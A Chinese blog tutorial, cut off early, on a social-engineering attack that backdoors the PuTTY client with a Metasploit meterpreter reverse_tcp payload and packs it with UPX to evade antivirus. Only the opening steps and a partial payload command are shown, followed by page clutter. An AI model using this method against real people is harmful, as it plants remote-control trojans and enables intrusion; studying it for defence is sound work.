社会工程学攻击案例-伪装木马

本文介绍了社会工程学攻击的一个实例,使用msfpayload创建后门程序putty_backdoor.exe,并探讨如何通过UPX来增强木马的免杀能力。在靶机上进行测试,发现部分杀毒软件能够识别未加壳的木马,但加壳后的putty_backdoor_upx6可以逃避检测。
摘要由CSDN通过智能技术生成

社会工程学攻击案例-伪装木马

msfpayload 做后门程序

root@bt:~# mkdir /root/example_01
//生成目录,名称为example_01
//将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版)
root@bt:~# cd /root/example_01/   //进入此文件夹
root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值